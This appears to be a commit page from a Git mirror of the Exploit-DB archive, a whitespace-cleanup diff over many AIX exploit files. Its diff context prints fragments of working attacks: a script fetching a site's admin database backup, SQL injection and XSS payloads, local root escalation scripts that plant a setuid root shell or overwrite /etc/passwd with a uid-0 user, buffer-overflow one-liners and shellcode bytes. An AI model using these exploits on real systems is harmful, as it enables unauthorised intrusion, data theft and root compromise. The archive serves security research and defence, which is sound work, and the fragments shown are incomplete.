bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2021-09-03

Browse source 
28807 changes to exploits/shellcodes
This commit is contained in:
Offensive Security 2021-09-03 20:19:21 +00:00
parent 27211ca2e7
commit b4c96a5864
28807 changed files with 217113 additions and 216600 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

36
exploits/aix/dos/15264.py
View file

@ -2,7 +2,7 @@
#-*- coding:cp1254 -*-
'''
@ -30,15 +30,15 @@
'''
import sys, urllib2, re, os, time
def indiriyoruz(url):
import urllib
@ -52,7 +52,7 @@ def indiriyoruz(url):
indiraq.close()
if len(sys.argv) < 3:
@ -90,13 +90,13 @@ if len(sys.argv) < 3:
sys.exit("\nexample: http://www.server.com/ 16-10-2010")
''' link kontrol 1 '''
add = "http://"
@ -118,7 +118,7 @@ if sitemiz[-1:] != add2:
print "its ok" + " " + sitemiz
if sitemiz[:7] != add:
@ -132,7 +132,7 @@ if sitemiz[:7] != add:
print "its ok" + " " + sitemiz
db = "admin/backup/db/backup_db_"
@ -142,25 +142,25 @@ uzanti = ".sql.gz"
url2 = sitemiz + db + tarih + uzanti
''' link kontrol 2 '''
try:
adreskontrol = urllib2.urlopen(url2).read()
if len(adreskontrol) > 0:
print "\nGood Job Bro!"
except urllib2.HTTPError:
@ -172,13 +172,13 @@ except urllib2.HTTPError:
sys.exit(1)
''' dosya indiriliyor '''
if __name__ == '__main__':

2
exploits/aix/dos/19046.txt
View file

@ -1,6 +1,6 @@
source: https://www.securityfocus.com/bid/61/info
There exists a buffer overflow in the Apple AppleShare IP Mail Server 5.0.3. If yu connect to the SMTP port
There exists a buffer overflow in the Apple AppleShare IP Mail Server 5.0.3. If yu connect to the SMTP port
and issue a HELO command with a large string (500 bytes or more) for a hostname the server, and possibly the whole machine, will crash.
$ telnet some.where

2
exploits/aix/dos/22249.txt
View file

@ -2,6 +2,6 @@ source: https://www.securityfocus.com/bid/6840/info
A buffer overflow vulnerability has been discovered in the libIM library available for the AIX 4.3, 5.1, 5.2 operating system. As a result it may be possible to overwrite sensitive memory in programs linked to the affected library. By identifying a linked application with the setuid bit applied, it may be possible to exploit this vulnerability to execute code with elevated privileges.
Under certain circumstances this issue may pose as a remote security threat.
Under certain circumstances this issue may pose as a remote security threat.
/usr/lpp/X11/bin/aixterm -im `perl -e 'print "A"x47; print pack("l",0x11223344)'`

2
exploits/aix/dos/25807.txt
View file

@ -1,5 +1,5 @@
source: https://www.securityfocus.com/bid/13909/info
invscout is prone to a local buffer overflow vulnerability. This issue presents itself because the application fails to carry out boundary checks on user-supplied data from the command line.
invscout is prone to a local buffer overflow vulnerability. This issue presents itself because the application fails to carry out boundary checks on user-supplied data from the command line.
/usr/sbin/invscout `perl -e 'print "A" x 1024;'`

8
exploits/aix/dos/33943.txt
View file

@ -30,7 +30,7 @@ Published
Affected Product(s):
===============
Erlyvideo, LLC
Product: Flussonic Media Server 4.1.25 - 4.3.3
Product: Flussonic Media Server 4.1.25 - 4.3.3
Exploitation Technique:
==================
@ -47,7 +47,7 @@ Technical Details & Description:
Its possible to read any files from the server (with the applications users permissions) by a simple HTTP GET request. Flussonics web interface login information can be found as plaintext by reading /etc/flussonic/flussonic.conf; thus, its possible to login any Flussonic web interface using that method.
2. Arbitrary Directory Listing (Authenticated)
Its possible to list any directories content sending a HTTP GET request to “flussonic/api/list_files” with the parameter “subpath=directory”.
Its possible to list any directories content sending a HTTP GET request to “flussonic/api/list_files” with the parameter “subpath=directory”.
Proof of Concept (PoC):
@ -125,9 +125,9 @@ Bilgi Güvenliði Akademisi
Disclaimer & Information:
===================
The information provided in this advisory is provided as it is without any warranty. BGA disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages.
Domain: http://bga.com.tr/advisories.html
Social: http://twitter.com/bgasecurity
Contact: bilgi@bga.com.tr
Copyright © 2014 | BGA

26
exploits/aix/dos/34588.txt
View file

@ -14,12 +14,12 @@
XSS install.php
code :
code :
if(isset($_REQUEST['msg'])) {
$msg=$_REQUEST['msg'];
echo "<p style=color:red>$msg</p>";
echo "<p style=color:red>$msg</p>";
}
@ -32,7 +32,7 @@ http://localhost/demo/POSNIC1.02DesignFix/install.php?msg=1%22%3E%3Cscript%3Eale
SQL INJECTION : stock.php
code :
code :
include_once("init.php");
@ -40,10 +40,10 @@ $q = strtolower($_GET["q"]);
if (!$q) return;
$db->query("SELECT * FROM stock_avail where quantity >0 ");
while ($line = $db->fetchNextObject()) {
if (strpos(strtolower($line->name), $q) !== false) {
echo "$line->name\n";
}
}
@ -90,7 +90,7 @@ searchtxt=-1' /*!UNION*/ /*!SELECT*/ 1,/*!12345CONCAT(id,0x3a,username,0x3a,pass
SQL INJECTION : view_product.php
code :
code :
if(isset($_GET['limit']) && is_numeric($_GET['limit'])){
$limit=$_GET['limit'];
@ -100,7 +100,7 @@ if(isset($_GET['limit']) && is_numeric($_GET['limit'])){
$page = $_GET['page'];
if($page)
if($page)
$start = ($page - 1) * $limit; //first item to display on this page
@ -108,7 +108,7 @@ if(isset($_GET['limit']) && is_numeric($_GET['limit'])){
$start = 0; //if no page var is given, set start to 0
/* Get data. */
@ -126,7 +126,7 @@ if(isset($_GET['limit']) && is_numeric($_GET['limit'])){
exploit :
exploit :
localhost/demo/POSNIC1.02DesignFix/view_product.php?page=1&limit=1(inject)
and
@ -142,10 +142,10 @@ searchtxt=a(inject)&Search=Search
UPLOAD : logo_set.php
code :
code :
<?php if(isset($_POST['submit'])){
$allowedExts = array("gif", "jpeg", "jpg", "png");
$temp = explode(".", $_FILES["file"]["name"]);
$extension = end($temp);
@ -168,7 +168,7 @@ if ((($_FILES["file"]["type"] == "image/gif")
exploit :
exploit :
http://localhost/demo/POSNIC1.02DesignFix/logo_set.php
#########################################################################################################

2
exploits/aix/dos/35342.txt
View file

@ -104,7 +104,7 @@ after you go here:
http://alpesoiseaux.free.fr/robotstats/info-robot.php?robot=(robot id)
or
or
http://alpesoiseaux.free.fr/robotstats/admin/robots.php

2
exploits/aix/local/1001.txt
View file

@ -13,7 +13,7 @@
# as fast as you can when bellmail prompt "?" appear.
#
# Author : watercloud@xfocus.org
# XFOCUS Team
# XFOCUS Team
# http://www.xfocus.net (CN)
# http://www.xfocus.org (EN)
#

2
exploits/aix/local/1044.c
View file

@ -39,7 +39,7 @@ char shellcode_binsh[] =
unsigned long cex_load_environment(char *env_buffer, char *address_buffer, char *payload, int environment_size, int buffer_size) {
int count, env_size = strlen(payload) + environment_size + 4 + 1;
unsigned long address, *ret_addressp;
if (DEBUG) printf("Adding nops to environment buffer...");
for ( count = 0; count < env_size - strlen(payload) - 1; count++ ) {
*(env_buffer++) = NOP;

2
exploits/aix/local/1045.c
View file

@ -40,7 +40,7 @@ char shellcode_binsh[] =
unsigned long cex_load_environment(char *env_buffer, char *address_buffer, char *payload, int environment_size, int buffer_size) {
int count, env_size = strlen(payload) + environment_size + 4 + 1;
unsigned long address, *ret_addressp;
if (DEBUG) printf("Adding nops to environment buffer...");
for ( count = 0; count < env_size - strlen(payload) - 1; count++ ) {
*(env_buffer++) = NOP;

2
exploits/aix/local/1046.c
View file

@ -40,7 +40,7 @@ char shellcode_binsh[] =
unsigned long cex_load_environment(char *env_buffer, char *address_buffer, char *payload, int environment_size, int buffer_size) {
int count, env_size = strlen(payload) + environment_size + 4 + 1;
unsigned long address, *ret_addressp;
if (DEBUG) printf("Adding nops to environment buffer...");
for ( count = 0; count < env_size - strlen(payload) - 1; count++ ) {
*(env_buffer++) = NOP;

2
exploits/aix/local/19214.c
View file

@ -1,5 +1,5 @@
// source: https://www.securityfocus.com/bid/268/info
A buffer overflow in libc's handling of the LC_MESSAGES environment variable allows a malicious user to exploit any suid root program linked agains libc to obtain root privileges. This problem is found in both IBM's AIX and Sun Microsystem's Solaris. This vulnerability allows local users to gain root privileges.
/*

10
exploits/aix/local/19215.c
View file

@ -1,6 +1,6 @@
/*
source: https://www.securityfocus.com/bid/268/info
A buffer overflow in libc's handling of the LC_MESSAGES environment variable allows a malicious user to exploit any suid root program linked agains libc to obtain root privileges. This problem is found in both IBM's AIX and Sun Microsystem's Solaris. This vulnerability allows local users to gain root privileges.
*/
@ -49,17 +49,17 @@ main(int argc, char *argv[])
putenv("LANG=");
memset(x,'x',70000);
if (argc == 2)
OFFSET = atoi(argv[1]);
else
OFFSET = 5392; // default offset for 2.6
for (i = 0; i < ADJUST; i++) x[i]=0x40;
for (i = ADJUST; i < 1000; i+=4){
x[i+3]=NOP & 0xff;
x[i+2]=(NOP >> 8 ) &0xff;
x[i+2]=(NOP >> 8 ) &0xff;
x[i+1]=(NOP >> 16 ) &0xff;
x[i+0]=(NOP >> 24 ) &0xff;
}

12
exploits/aix/local/19216.c
View file

@ -1,19 +1,19 @@
// source: https://www.securityfocus.com/bid/268/info
A buffer overflow in libc's handling of the LC_MESSAGES environment variable allows a malicious user to exploit any suid root program linked agains libc to obtain root privileges. This problem is found in both IBM's AIX and Sun Microsystem's Solaris. This vulnerability allows local users to gain root privileges.
#include <fcntl.h>
/* arpexp.c
arp overflow proof of concept by ahmed@securityfocus.com
shellcode originally written by Cheez Whiz.
tested on x86 solaris 7,8beta
default should work. if not, arg1 = offset. +- by 100's
Except for shellcode, copyright Security-Focus.com, 11/2000
default should work. if not, arg1 = offset. +- by 100's
Except for shellcode, copyright Security-Focus.com, 11/2000
*/
long get_esp() { __asm__("movl %esp,%eax"); }
@ -34,7 +34,7 @@ int main(int ac, char **av)
"\xff\xff";
unsigned long magic = 0x8047b78;
unsigned long r = get_esp() + 600;
unsigned long r = get_esp() + 600;
unsigned char buf[300];
int f;

4
exploits/aix/local/19217.c
View file

@ -1,6 +1,6 @@
/*
source: https://www.securityfocus.com/bid/268/info
A buffer overflow in libc's handling of the LC_MESSAGES environment variable allows a malicious user to exploit any suid root program linked agains libc to obtain root privileges. This problem is found in both IBM's AIX and Sun Microsystem's Solaris. This vulnerability allows local users to gain root privileges.
*/
@ -54,7 +54,7 @@ main()
for (i=0;i<strlen(exploit_code);i++) x[STARTADR+i+ADJUST]=exploit_code[i];
ret_adr=get_sp()-OFFSET;
printf("jumping address : %lx\n",ret_adr);
if ((ret_adr & 0xff) ==0 ){
if ((ret_adr & 0xff) ==0 ){
ret_adr -=16;
printf("New jumping address : %lx\n",ret_adr);
}

2
exploits/aix/local/19229.txt
View file

@ -1,6 +1,6 @@
soure: https://www.securityfocus.com/bid/287/info
IBM's eNetwork Firewall for AIX contains a number of vulnerability in scripts which manipulate files insecurely. When fwlsuser script is run it creates a temporary file called /tmp/fwlsuser.PID ( where PID is the process ID of the command being run ). If this file is created previously and is a link to any other file the output generated by the fwlsuser script will overwrite this linked file.
IBM's eNetwork Firewall for AIX contains a number of vulnerability in scripts which manipulate files insecurely. When fwlsuser script is run it creates a temporary file called /tmp/fwlsuser.PID ( where PID is the process ID of the command being run ). If this file is created previously and is a link to any other file the output generated by the fwlsuser script will overwrite this linked file.
x = 5000
while true

2
exploits/aix/local/19300.txt
View file

@ -1,5 +1,5 @@
source: https://www.securityfocus.com/bid/375/info
The snap command is a diagnostic utlitiy for gathering system information on AIX platforms. It can only be executed by root, but it copies various system files into /tmp/ibmsupt/ under /tmp/ibmsupt/general/ you will find the passwd file with cyphertext. The danger here is if a system administrator executes snap -a as sometimes requested by IBM support while diagnosing a problem it defeats password shadowing. /tmp/ibmsupt is created with 755 permissions they may carry out a symlink attack and gain access to the password file.
The snap command is a diagnostic utlitiy for gathering system information on AIX platforms. It can only be executed by root, but it copies various system files into /tmp/ibmsupt/ under /tmp/ibmsupt/general/ you will find the passwd file with cyphertext. The danger here is if a system administrator executes snap -a as sometimes requested by IBM support while diagnosing a problem it defeats password shadowing. /tmp/ibmsupt is created with 755 permissions they may carry out a symlink attack and gain access to the password file.
snap is a shell script which uses cp -p to gather system information. Data from /etc/security is gathered between lines 721 - 727. Seeing that snap uses the /tmp/ibmsupt/general directory someone may create the directory as a normal user (tested on on AIX 4.2.1). The user may then do a touch on /tmp/ibmsupt/general/passwd. Once the passwd file is created do tail -f /tmp/ibmsupt/general/passwd. If in another session someone loggs in as root and ran snap -a - this will cause the contents of the /etc/security/passwd to show up in tail command.

2
exploits/aix/local/19306.c
View file

@ -1,7 +1,7 @@
/*
source: https://www.securityfocus.com/bid/385/info
AIX version 4.2.1 introduced a new command titled 'portmir'. This new program had two notable vulnerabilites. First it contained a buffer overflow which allowed malicious users to obtain root privileges. Secondly it wrote it's log files to a world readable directly thereby exposing security relavent information.
AIX version 4.2.1 introduced a new command titled 'portmir'. This new program had two notable vulnerabilites. First it contained a buffer overflow which allowed malicious users to obtain root privileges. Secondly it wrote it's log files to a world readable directly thereby exposing security relavent information.
*/
/*## copyright LAST STAGE OF DELIRIUM oct 2000 poland *://lsd-pl.net/ #*/

2
exploits/aix/local/19344.sh
View file

@ -1,6 +1,6 @@
#source: https://www.securityfocus.com/bid/454/info
#
#Under older versions of AIX By changing the IFS enviroment variable to / setuid root programs that use system() or popen() can be fooled into running user provided programs.
#Under older versions of AIX By changing the IFS enviroment variable to / setuid root programs that use system() or popen() can be fooled into running user provided programs.
#
#!/bin/csh

2
exploits/aix/local/19345.txt
View file

@ -1,6 +1,6 @@
source: https://www.securityfocus.com/bid/455/info
There exists a vulnerability in the lquerypv command under AIX. By using the '-h' flaq, a user may read any file on the file system in hex format.
There exists a vulnerability in the lquerypv command under AIX. By using the '-h' flaq, a user may read any file on the file system in hex format.
/usr/sbin/lquerypv -h /pathtofilename

2
exploits/aix/local/20290.txt
View file

@ -2,5 +2,5 @@ source: https://www.securityfocus.com/bid/1800/info
A vulnerability exists in AIX 3.* versions of bugfiler, a utility which automates the process of reporting an filing system bugs. Bugfiler, installed setuid root, creates files in a directory specified by the user invoking the program (example: $/lib/bugfiler -b <user> directory>). It may be possible for an attacker to create files in arbitrary directories that are owned by attacker-specified users. This may result in an elevation of privileges for the attacker. Further technical details about this vulnerability are not known.
$whoami eviluser
$whoami eviluser
$/lib/bugfiler -b <user> <directory> creates funny files under the <user>-owned <directory> and that may be used by crackers to increase privileges. See the manpage of bugfiler for more information. (bugfiler does not work for some <user>s)

2
exploits/aix/local/20452.c
View file

@ -3,7 +3,7 @@ source: https://www.securityfocus.com/bid/2032/info
AIX is a version of the UNIX Operating System distributed by IBM. A problem exists that could allow a user elevated priviledges.
The problem occurs in the setsenv binary. It has been reported that a buffer overflow exists in this binary which could allow a user to overwrite variables on the stack, including the return address. This makes it possible for a malicious user to execute arbitrary code, and potentially attain a UID of 0.
The problem occurs in the setsenv binary. It has been reported that a buffer overflow exists in this binary which could allow a user to overwrite variables on the stack, including the return address. This makes it possible for a malicious user to execute arbitrary code, and potentially attain a UID of 0.
*/
/*## copyright LAST STAGE OF DELIRIUM sep 2000 poland *://lsd-pl.net/ #*/

2
exploits/aix/local/20453.c
View file

@ -5,7 +5,7 @@ AIX is a version of the UNIX Operating System distributed by IBM. A vulnerabilit
The problem occurs in the digest binary. It is reported that it is possible to overflow a buffer in the program and overwrite a pointer to the stack, which in turn can result in an overflow in a library referenced by the binary. The secondary overflow in the library makes it possible to overwrite other stack variables, including the return address.
A malicious user could use this vulnerability to gain an elevation in priviledges, and potentially UID 0.
A malicious user could use this vulnerability to gain an elevation in priviledges, and potentially UID 0.
*/
/*## copyright LAST STAGE OF DELIRIUM dec 2000 poland *://lsd-pl.net/ #*/

4
exploits/aix/local/20454.sh
View file

@ -2,7 +2,7 @@ source: https://www.securityfocus.com/bid/2034/info
AIX is a variant of the UNIX Operating System, distributed by IBM. A problem exists that may allow elevation of user priviledges.
The problem occurs in the enq program. It is reported that an overflow exists in the command line argument parsing, which could lead to the overwriting of variables on the stack. This creates the potential for a malicious user to execute arbitrary code, and possibly gain administrative access.
The problem occurs in the enq program. It is reported that an overflow exists in the command line argument parsing, which could lead to the overwriting of variables on the stack. This creates the potential for a malicious user to execute arbitrary code, and possibly gain administrative access.
#!/bin/sh
# FileName: ex_enq_aix4x.sh
@ -53,6 +53,6 @@ env | awk -F = '{print "unset "$1;}'|grep -v LOGNAME > $TMP
CC=A`$PERL $SHPL` ; export CC
/bin/rm -f $SHPL
/usr/bin/enq -w"`perl -e 'print "\x2f\xf2\x2b\x10"x600'`"
/usr/bin/enq -w"`perl -e 'print "\x2f\xf2\x2b\x10"x600'`"
#EOF

2
exploits/aix/local/20455.c
View file

@ -3,7 +3,7 @@ source: https://www.securityfocus.com/bid/2037/info
AIX is a variant of the UNIX Operating System, distributed by IBM. A problem exists which can allow a local user elevated priviledges.
The problem exists in the piobe program. Due to the insuffient handling of the PIOSTATUSFILE, PIOTITLE, and PIOVARDIR environment variables, it's possible to overwrite stack variables. This makes it possible for a malicious user to pass specially formatted strings to the program via environment variables, and potentially gain administrative access.
The problem exists in the piobe program. Due to the insuffient handling of the PIOSTATUSFILE, PIOTITLE, and PIOVARDIR environment variables, it's possible to overwrite stack variables. This makes it possible for a malicious user to pass specially formatted strings to the program via environment variables, and potentially gain administrative access.
*/
/*## copyright LAST STAGE OF DELIRIUM dec 2000 poland *://lsd-pl.net/ #*/

2
exploits/aix/local/20965.sh
View file

@ -4,7 +4,7 @@ AIX ships with a diagnostic reporting utility called 'diagrpt'. This utility is
When 'diagrpt' executes, it relies on an environment variable to locate another utility which it executes. This utility is executed by 'diagrpt' as root.
An attacker can gain root privileges by having 'diagrpt' execute a malicious program of the same name in a directory under their control.
An attacker can gain root privileges by having 'diagrpt' execute a malicious program of the same name in a directory under their control.
#!/bin/sh
# FileName: x_diagrpt.sh

8
exploits/aix/local/21094.c
View file

@ -1,10 +1,10 @@
// source: https://www.securityfocus.com/bid/3238/info
//
//
// The 'piomkapqd' utility is a component of the AIX printing subsystem. By default, it is installed setgid and owned by the 'printk' group.
//
//
// 'piomkapqd' contains a locally exploitable stack overrun condition in it's handling of command line parameters.
//
// Local users may be able to gain group 'printk' privileges if this vulnerability is exploited. It may be possible to elevate to root from this point by exploiting vulnerabilities in other components of the printing subsystem.
//
// Local users may be able to gain group 'printk' privileges if this vulnerability is exploited. It may be possible to elevate to root from this point by exploiting vulnerabilities in other components of the printing subsystem.
/*## copyright LAST STAGE OF DELIRIUM sep 2000 poland *://lsd-pl.net/ #*/
/*## /usr/lib/lpd/pio/etc/piomkapqd #*/

2
exploits/aix/local/22756.pl
View file

@ -1,6 +1,6 @@
source: https://www.securityfocus.com/bid/7871/info
Insufficient bounds checking in the lsmcode utility will allow locally based attackers to cause memory to be corrupted with attacker-supplied data. As a result, it is possible to exploit this condition to execute arbitrary attacker-supplied instructions with elevated privileges.
Insufficient bounds checking in the lsmcode utility will allow locally based attackers to cause memory to be corrupted with attacker-supplied data. As a result, it is possible to exploit this condition to execute arbitrary attacker-supplied instructions with elevated privileges.
#!/usr/bin/perl
# FileName: x_lsmcode_aix4x.pl

2
exploits/aix/local/23838.pl
View file

@ -9,7 +9,7 @@ This issue is reported to exist on AIX 4.3.3 platforms.
#!/usr/bin/perl
# FileName: x_make_aix433_limited.pl
# Exploit /usr/local/bin/make of Aix4.3.3 to get a gid=0 shell.
# Tested on low version of Aix4.3.3.
# Tested on low version of Aix4.3.3.
# Author : watercloud@xfocus.org
# Site : www.xfocus.org (EN) / www.xfocus.net (CN)
# Date : 2003-5-30

6
exploits/aix/local/23841.c
View file

@ -1,9 +1,9 @@
// source: https://www.securityfocus.com/bid/9905/info
getlvcb has been reported to be prone to a buffer overflow vulnerability.
When an argument is passed to the getlvcb utility, the string is copied into a reserved buffer in memory. Data that exceeds the size of the reserved buffer will overflow its bounds and will trample any saved data that is adjacent to the affected buffer. Ultimately this may lead to the execution of arbitrary instructions in the context of the root user.
An attacker will require system group privileges prior to the execution of the getlvcb utility, the attacker may exploit the issue described in BID 9903 in order to gain the necessary privileges required to exploit this vulnerability.
/********************************************************************

2
exploits/aix/local/23883.pl
View file

@ -7,7 +7,7 @@ This issue may allow a malicious user to corrupt arbitrary files on the affected
#!/usr/bin/perl
# FileName: x_invscoutd.pl
# Exploit invscoutd of Aix4.x & 5L to get a uid=0 shell.
# Tested : on Aix4.3.3 & Aix5.1.
# Tested : on Aix4.3.3 & Aix5.1.
# Some high version of invscoutd is not affected.
# Author : watercloud@xfocus.org
# Site : www.xfocus.org www.xfocus.net

2
exploits/aix/local/25039.txt
View file

@ -2,7 +2,7 @@ source: https://www.securityfocus.com/bid/12041/info
diag is reported prone to a local privilege escalation vulnerability. This issue is due to a failure of certain diag applications to properly implement security controls when executing an application specified by the 'DIAGNOSTICS' environment variable.
A local attacker may leverage this issue to gain superuser privileges on a computer running the affected software.
A local attacker may leverage this issue to gain superuser privileges on a computer running the affected software.
mkdirhier /tmp/aap/bin
export DIAGNOSTICS=/tmp/aap

2
exploits/aix/local/26997.txt
View file

@ -1,6 +1,6 @@
source: https://www.securityfocus.com/bid/16103/info
IBM AIX is prone to a local vulnerability in getShell and getCommand. This vulnerability may let the attacker gain unauthorized read access to shell scripts on the computer.
IBM AIX is prone to a local vulnerability in getShell and getCommand. This vulnerability may let the attacker gain unauthorized read access to shell scripts on the computer.
-bash-3.00$ ls -l /tmp/k.sh -rwx------ 1 root system 79 2005-12-22 23:40
/tmp/k.sh

8
exploits/aix/local/28507.sh
View file

@ -12,9 +12,9 @@
# CVE: CVE-2013-4011
echo '
mm mmmmm m m
## # # #
# # # ##
#mm# # m""m
## # # #
# # # ##
#mm# # m""m
# # mm#mm m" "m
'
echo "[*] AIX root privilege escalation"
@ -48,7 +48,7 @@ RSHELL=${TMPDIR}/r00t-sh
cat > ${TAINT} <<-!
#!/bin/sh
cp /bin/sh ${RSHELL}
chown root ${RSHELL}
chown root ${RSHELL}
chmod 4555 ${RSHELL}
!

4
exploits/aix/local/30399.c
View file

@ -2,7 +2,7 @@
IBM AIX is prone to a local, stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input to a program that is installed setuid-superuser.
Local attackers can exploit this issue to execute arbitrary code with superuser privileges. Failed attacks will likely cause denial-of-service conditions.
Local attackers can exploit this issue to execute arbitrary code with superuser privileges. Failed attacks will likely cause denial-of-service conditions.
/* 07/2007: public release
*
@ -98,7 +98,7 @@ ulong get_addr(char *argv[], char *envp[], char *args[], char *envs[])
len += strlen(envs[i]) + 1;
}
while (off & 3)
strcat(envs[0], "X"), off++, len++;
strcat(envs[0], "X"), off++, len++;
return top - ALIGN(len, 4) + off;
}

2
exploits/aix/local/333.c
View file

@ -155,6 +155,6 @@ L=`expr $L + 144`
./a.out $L
done
/str0ke
*/
*/
// milw0rm.com [1997-05-27]

2
exploits/aix/local/33725.txt
View file

@ -32,7 +32,7 @@ a time of check, time of use race condition by creating a symlink from
the ODMTRACE0 in the current working directory to the target file under
hoping that the link will be added after the check has been made that
ODMTRACE0 does not exist.
Further details at:
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-3977/

4
exploits/aix/local/38576.sh
View file

@ -5,11 +5,11 @@
# Exploit Author: S2 Crew [Hungary]
# Vendor Homepage: www.ibm.com
# Software Link: -
# Version: -
# Version: -
# Tested on: AIX 7.1 (7100-02-03-1334)
# CVE : CVE-2014-8904
#
# From file writing to command execution ;)
# From file writing to command execution ;)
#
export _DBGCMD_LQUERYLV=1
umask 0

2
exploits/aix/local/40709.sh
View file

@ -1,6 +1,6 @@
#!/usr/bin/sh
#
# AIX lsmcode local root exploit.
# AIX lsmcode local root exploit.
#
# Affected: AIX 6.1/7.1/7.2.0.2
#

22
exploits/aix/local/40710.sh
View file

@ -3,29 +3,29 @@
# AIX lquerylv 5.3, 6.1, 7.1, 7.2 local root exploit. Tested against latest patchset (7100-04)
#
# This exploit takes advantage of known issues with debugging functions
# within the AIX linker library. We are taking advantage of known
# within the AIX linker library. We are taking advantage of known
# functionality, and focusing on badly coded SUID binaries which do not
# adhere to proper security checks prior to seteuid/open/writes.
#
# The CVEs we will be taking advantage of:
# - CVE-2009-1786: The malloc subsystem in libc in IBM AIX 5.3 and 6.1 allows
# - CVE-2009-1786: The malloc subsystem in libc in IBM AIX 5.3 and 6.1 allows
# local users to create or overwrite arbitrary files via a symlink attack on
# the log file associated with the MALLOCDEBUG environment variable.
# the log file associated with the MALLOCDEBUG environment variable.
#
# - CVE-2009-2669: A certain debugging component in IBM AIX 5.3 and 6.1 does
# not properly handle the (1) _LIB_INIT_DBG and (2) _LIB_INIT_DBG_FILE
# environment variables, which allows local users to gain privileges by
# leveraging a setuid-root program to create an arbitrary root-owned file
# - CVE-2009-2669: A certain debugging component in IBM AIX 5.3 and 6.1 does
# not properly handle the (1) _LIB_INIT_DBG and (2) _LIB_INIT_DBG_FILE
# environment variables, which allows local users to gain privileges by
# leveraging a setuid-root program to create an arbitrary root-owned file
# with world-writable permissions, related to libC.a (aka the XL C++ runtime
# library) in AIX 5.3 and libc.a in AIX 6.1.
# library) in AIX 5.3 and libc.a in AIX 6.1.
#
# - CVE-2014-3074: Runtime Linker Allows Privilege Escalation Via Arbitrary
# - CVE-2014-3074: Runtime Linker Allows Privilege Escalation Via Arbitrary
# File Writes In IBM AIX.
#
# In each instance of the aforementioned CVEs, IBM merely patched the binaries
# In each instance of the aforementioned CVEs, IBM merely patched the binaries
# which were reported in the original reports as being used for escalation of
# the vulnerabilities. This allowed for the lquerylv binary to slip by their
# patches and become an attack vector.
# patches and become an attack vector.
#
# Blog post URL: https://rhinosecuritylabs.com/2016/11/03/unix-nostalgia-hunting-zeroday-vulnerabilities-ibm-aix/
#

2
exploits/aix/local/4231.c
View file

@ -88,7 +88,7 @@ ulong get_addr(char *argv[], char *envp[], char *args[], char *envs[])
len += strlen(envs[i]) + 1;
}
while (off & 3)
strcat(envs[0], "X"), off++, len++;
strcat(envs[0], "X"), off++, len++;
return top - ALIGN(len, 4) + off;
}

2
exploits/aix/local/4233.c
View file

@ -98,7 +98,7 @@ int main(int argc, char *argv[], char *envp[])
char *args[] = { TARGET, NULL };
char *envs[] = { pad, egg, NULL };
int pi[2], po[2], i;
pid_t child;
pid_t child;
ulong addr;
sprintf(egg, "EGG=%s/proc/%d/object/a.out|", qaazcode, getpid());

37
exploits/aix/local/45938.pl
View file

@ -17,7 +17,7 @@
# file system, due to incorrect checks in the parsing of the option.
#
# This is a port of the OpenBSD X11 Xorg exploit to run on AIX.
# It overwrites /etc/passwd in order to create a new user with root privileges.
# It overwrites /etc/passwd in order to create a new user with root privileges.
# All currently logged in users need to be included when /etc/passwd is overwritten,
# else AIX will throw 'Cannot get "LOGNAME" variable' when attempting to change user.
# The Xorg '-fp' parameter used in the OpenBSD exploit does not work on AIX,
@ -35,7 +35,7 @@
# $ oslevel -s
# 7100-04-00-0000
# $ Xorg -version
#
#
# X Window System Version 7.1.1
# Release Date: 12 May 2006
# X Protocol Version 11, Revision 0, Release 7.1.1
@ -49,18 +49,18 @@
# uid=16500(nmyo) gid=1(staff)
# $ perl aixxorg.pl
# [+] AIX X11 server local root exploit
# [-] Checking for Xorg and ksh93
# [-] Opening /etc/passwd
# [-] Retrieving currently logged in users
# [-] Generating Xorg command
# [-] Opening /tmp/wow.ksh
# [-] Writing Xorg command to /tmp/wow.ksh
# [-] Backing up /etc/passwd to /tmp/passwd.backup
# [-] Making /tmp/wow.ksh executable
# [-] Executing /tmp/wow.ksh
# [-] Cleaning up /etc/passwd and removing /tmp/wow.ksh
# [-] Done
# [+] 'su wow' for root shell
# [-] Checking for Xorg and ksh93
# [-] Opening /etc/passwd
# [-] Retrieving currently logged in users
# [-] Generating Xorg command
# [-] Opening /tmp/wow.ksh
# [-] Writing Xorg command to /tmp/wow.ksh
# [-] Backing up /etc/passwd to /tmp/passwd.backup
# [-] Making /tmp/wow.ksh executable
# [-] Executing /tmp/wow.ksh
# [-] Cleaning up /etc/passwd and removing /tmp/wow.ksh
# [-] Done
# [+] 'su wow' for root shell
# $ su wow
# # id
# uid=0(root) gid=0(system)
@ -73,7 +73,7 @@ print "[+] AIX X11 server local root exploit\n";
# Check Xorg is in path
print "[-] Checking for Xorg and ksh93 \n";
chomp($xorg = `command -v Xorg`);
if ($xorg eq ""){
if ($xorg eq ""){
print "[X] Can't find Xorg binary, try hardcode it? exiting... \n";
exit;
}
@ -114,7 +114,7 @@ foreach my $user (@users)
print "[-] Generating Xorg command \n";
$blob = '-config ' . '$\'' . $users_logged_in_passwd . '\nwow::0:0::/:/usr/bin/ksh\n#' . '\'';
print "[-] Opening /tmp/wow.ksh \n";
print "[-] Opening /tmp/wow.ksh \n";
open($fr, '>', "/tmp/wow.ksh");
# Use ksh93 for ANSI-C quoting
@ -123,7 +123,7 @@ print $fr '#!' . "$ksh\n";
print $fr "$xorg $blob -logfile ../etc/passwd :1 > /dev/null 2>&1 \n";
close $fr;
# Backup passwd
# Backup passwd
print "[-] Backing up /etc/passwd to /tmp/passwd.backup \n";
system("cp /etc/passwd /tmp/passwd.backup");
@ -138,4 +138,5 @@ print "[-] Cleaning up /etc/passwd and removing /tmp/wow.ksh \n";
$result = `su wow "-c cp /tmp/passwd.backup /etc/passwd && echo 'wow::0:0::/:/usr/bin/ksh' >> /etc/passwd" && rm /tmp/wow.ksh`;
print "[-] Done \n";
print "[+] 'su wow' for root shell \n";
print "[+] 'su wow' for root shell \n";

32
exploits/aix/local/699.c
View file

@ -12,18 +12,18 @@
char shellcode[] =
"\x7c\xa5\x2a\x79"
"\x40\x82\xff\xfd"
"\x7c\xa8\x02\xa6"
"\x40\x82\xff\xfd"
"\x7c\xa8\x02\xa6"
"\x38\xe0\x11\x11"
"\x39\x20\x48\x11"
"\x7c\xc7\x48\x10"
"\x38\x46\xc9\x05"
